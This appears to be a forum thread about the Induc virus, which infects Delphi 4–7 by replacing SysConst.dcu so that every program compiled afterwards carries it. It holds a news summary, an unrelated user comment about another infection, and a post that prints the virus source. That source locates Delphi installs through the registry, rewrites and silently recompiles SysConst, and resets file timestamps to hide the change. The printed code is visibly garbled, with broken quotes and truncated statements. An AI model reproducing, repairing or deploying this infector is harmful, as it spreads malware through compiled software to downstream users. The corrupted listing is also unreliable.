Check SysConst.dcu Anti-virus software vendor Gdata, Avira, McAfee and Kaspersky has discovered a new type of virus which infects and compromises systems running the Delphi development environment. After infection, all Delphi programs compiled using the infected Delphi environment are also infected. Anti-virus laboratory AV-Test has already spotted the first examples in the wild. The virus affects Delphi versions 4.0, 5.0, 6.0 and 7.0. After making a backup which it names SysConst.bak, it overwrites the Delphi file SysConst.dcu with a self-compiled version. Since the infected file is loaded whenever Delphi programs are compiled, all programs generated after this point will be infected as "Virus.Win32.Induc.a". McAfee reports infected files as "W32/Induc" or "Generic!Artemis". Other anti-virus vendors have been informed of the virus and are working on updates.
wow o shoot omg dude u posted this 1 day ago...and today...i turned on my computer....and my MMicrosoft Security Essentials showed a message saying i was infected by a severe virus i clicked on it and it game from that game boosting software...."Game Booster" from iolo software....wtf....i mean...isn't iolo like trusted?and thats what infected my computer... luckily my antivirus cleaned it and i am no longer infected
Here’s something you don’t see every day - a virus that infects Delphi files … at compile-time. - some of the found virus code from slippppppppp - look here: Code: uses windows; var sc:array[1..24] of string=( function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s" =#36 then s:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0); if h<>DWORD(-1) then begin CloseHandle(h); exit; end; {$I-}assignfile(f1,s); reset(f1); if ioresult<>0 then exit;assignfile" (f2,d+$pas$); rewrite(f2); if ioresult<>0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,$$$$+sc[h],$$$,$); writeln(f2,$$$$+sc[24]+$$$);$); for h:= 2 to 24 do writeln(f2, x(sc[h])); closefile(f1); closefile(f2); {$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$)); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW; f.wShowWindow:=SW_HIDE; b:=CreateProcess(nil,pchar(e+$""$+d+$pas""$),0,0,false,0,0,0,"f,p); if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$), pchar(d+$dcu$)); DeleteFile(pchar(d+$pas$)); h:=CreateFile(pchar(d+$bak$),0,0,0,3,"0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h:= CreateFile(pchar(d+$dcu$),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY; c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx( HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then begin i:=255;i if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$; i:= 1; while c<>#0 do begin r:=r+c;inc(i); end; re(r+$\source\rtl\sys\SysConst$+$.pas$,r+$\lib\sysconst.$,$$+r+$\bin\dcc32.exe"" $); end; RegCloseKey(k); end; end;" //main code begin st; end."